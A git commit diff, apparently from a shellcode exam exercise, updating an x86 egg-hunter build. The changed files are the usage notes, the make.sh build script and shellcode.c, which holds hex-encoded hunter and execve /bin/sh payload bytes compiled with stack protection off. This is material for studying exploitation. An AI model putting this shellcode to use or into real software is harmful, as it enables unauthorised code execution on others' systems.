minor updates
This commit is contained in:
parent
eea59770f7
commit
7a26aee784
16
exam3/USAGE
16
exam3/USAGE
@ -9,25 +9,23 @@ exam3$ ln -svf payload-execve-stack.nasm payload.nasm
|
|||||||
|
|
||||||
2. Compile the shellcode with a custom "egg" (must be 8 bytes in length)
|
2. Compile the shellcode with a custom "egg" (must be 8 bytes in length)
|
||||||
|
|
||||||
exam3$ ./make.sh "cust.egg"
|
exam3$ ./make.sh
|
||||||
[I] Using custom EGG mark: cust.egg
|
[I] Argument not specified. Using default EGG mark.
|
||||||
[+] Compiling payload.nasm ...
|
[+] Compiling payload.nasm ...
|
||||||
[+] Compiling egg.nasm ...
|
|
||||||
[+] Compiling hunter.nasm ...
|
[+] Compiling hunter.nasm ...
|
||||||
[+] Extracting EGG code from egg ...
|
|
||||||
[+] Extracting PAYLOAD code from payload ...
|
[+] Extracting PAYLOAD code from payload ...
|
||||||
|
[+] Adding EGG mark to PAYLOAD ...
|
||||||
[+] Checking PAYLOAD code for NULLs ...
|
[+] Checking PAYLOAD code for NULLs ...
|
||||||
[+] Extracting HUNTER code from hunter ...
|
[+] Extracting HUNTER code from hunter ...
|
||||||
[+] Checking HUNTER code for NULLs ...
|
[+] Checking HUNTER code for NULLs ...
|
||||||
[+] Compiling shellcode.c ...
|
[+] Compiling shellcode.c ...
|
||||||
-rwx------. 1 arno arno 5108 Mar 27 15:00 ./shellcode
|
-rwx------. 1 arno arno 5100 Mar 27 16:46 ./shellcode
|
||||||
[+] All done!
|
[+] All done!
|
||||||
|
|
||||||
|
|
||||||
3. Run the shellcode
|
3. Run the shellcode
|
||||||
|
|
||||||
exam3$ ./shellcode
|
exam3$ ./shellcode
|
||||||
Hunter Length: 37
|
Hunter Length: 29
|
||||||
Payload Length: 43
|
Payload Length: 36
|
||||||
sh-4.1$
|
sh-4.1$ exit
|
||||||
|
|
||||||
|
@ -1,32 +0,0 @@
|
|||||||
; This program is free software: you can redistribute it and/or modify
|
|
||||||
; it under the terms of the GNU General Public License as published by
|
|
||||||
; the Free Software Foundation, either version 3 of the License, or
|
|
||||||
; (at your option) any later version.
|
|
||||||
;
|
|
||||||
; This program is distributed in the hope that it will be useful,
|
|
||||||
; but WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
||||||
; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
|
||||||
; GNU General Public License for more details.
|
|
||||||
;
|
|
||||||
; You should have received a copy of the GNU General Public License
|
|
||||||
; along with this program. If not, see <http://www.gnu.org/licenses/>.
|
|
||||||
;
|
|
||||||
;
|
|
||||||
; Filename: egg.nasm
|
|
||||||
; Author: Andrey Arapov <andrey.arapov@gmail.com>
|
|
||||||
; 2013 March
|
|
||||||
;
|
|
||||||
;
|
|
||||||
|
|
||||||
section .text
|
|
||||||
global _start
|
|
||||||
|
|
||||||
_start:
|
|
||||||
;db "Egg-Mark" ; QWORD egg marker - will be appended in shellcode.c after running 'make.sh'
|
|
||||||
|
|
||||||
; loop counter = 8
|
|
||||||
xor ecx, ecx
|
|
||||||
mov cl, 8
|
|
||||||
decloop:
|
|
||||||
dec eax
|
|
||||||
loop decloop
|
|
@ -32,27 +32,21 @@ NEWEGG=($(echo -n $EGGMARK | sed -e 's/\(....\)/\1\n/g'))
|
|||||||
EGGMARK=$(echo -n $ARG1 | od -A n -t x1 |sed 's/ /\\x/g')
|
EGGMARK=$(echo -n $ARG1 | od -A n -t x1 |sed 's/ /\\x/g')
|
||||||
|
|
||||||
# Cleanup
|
# Cleanup
|
||||||
rm -f shellcode payload.o payload egg.o egg hunter.o hunter
|
rm -f shellcode payload.o payload hunter.o hunter
|
||||||
|
|
||||||
echo " [+] Compiling payload.nasm ..."
|
echo " [+] Compiling payload.nasm ..."
|
||||||
nasm -f elf32 -o payload.o payload.nasm
|
nasm -f elf32 -o payload.o payload.nasm
|
||||||
ld -m elf_i386 -o payload payload.o
|
ld -m elf_i386 -o payload payload.o
|
||||||
|
|
||||||
echo " [+] Compiling egg.nasm ..."
|
|
||||||
nasm -f elf32 -o egg.o egg.nasm
|
|
||||||
ld -m elf_i386 -o egg egg.o
|
|
||||||
|
|
||||||
echo " [+] Compiling hunter.nasm ..."
|
echo " [+] Compiling hunter.nasm ..."
|
||||||
nasm -f elf32 -o hunter.o hunter.nasm
|
nasm -f elf32 -o hunter.o hunter.nasm
|
||||||
ld -m elf_i386 -o hunter hunter.o
|
ld -m elf_i386 -o hunter hunter.o
|
||||||
|
|
||||||
echo " [+] Extracting EGG code from egg ..."
|
|
||||||
EGGCODE=$(objdump -d ./egg |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s)
|
|
||||||
|
|
||||||
echo " [+] Extracting PAYLOAD code from payload ..."
|
echo " [+] Extracting PAYLOAD code from payload ..."
|
||||||
PAYLOADCODE=$(objdump -d ./payload |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s)
|
PAYLOADCODE=$(objdump -d ./payload |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s)
|
||||||
|
|
||||||
FULL_PAYLOADCODE=$(echo -n ${EGGMARK}${EGGCODE}${PAYLOADCODE}|sed 's/^/"/' |sed 's/$/"/g')
|
echo " [+] Adding EGG mark to PAYLOAD ..."
|
||||||
|
FULL_PAYLOADCODE=$(echo -n ${EGGMARK}${PAYLOADCODE}|sed 's/^/"/' |sed 's/$/"/g')
|
||||||
|
|
||||||
echo " [+] Checking PAYLOAD code for NULLs ..."
|
echo " [+] Checking PAYLOAD code for NULLs ..."
|
||||||
if [[ $FULL_PAYLOADCODE == *00* ]]; then
|
if [[ $FULL_PAYLOADCODE == *00* ]]; then
|
||||||
@ -129,7 +123,7 @@ echo " [+] Compiling shellcode.c ..."
|
|||||||
gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode
|
gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode
|
||||||
|
|
||||||
# Cleanup
|
# Cleanup
|
||||||
rm -f payload.o payload egg.o egg hunter.o hunter
|
rm -f payload.o payload hunter.o hunter
|
||||||
|
|
||||||
ls -la ./shellcode
|
ls -la ./shellcode
|
||||||
|
|
||||||
|
@ -5,7 +5,7 @@ unsigned char hunter[] = "\xeb\x16\x58\x40\x81\x78\xf8\x45\x67\x67\x2d\x75\xf6\x
|
|||||||
|
|
||||||
unsigned char garbage1[] = "Just some garbage here...";
|
unsigned char garbage1[] = "Just some garbage here...";
|
||||||
|
|
||||||
unsigned char payload[] = "\x45\x67\x67\x2d\x4d\x61\x72\x6b\x31\xc9\xb1\x08\x48\xe2\xfd\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80";
|
unsigned char payload[] = "\x45\x67\x67\x2d\x4d\x61\x72\x6b\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80";
|
||||||
|
|
||||||
unsigned char garbage2[] = "And some garbage there...";
|
unsigned char garbage2[] = "And some garbage there...";
|
||||||
|
|
||||||
|
Loading…
Reference in New Issue
Block a user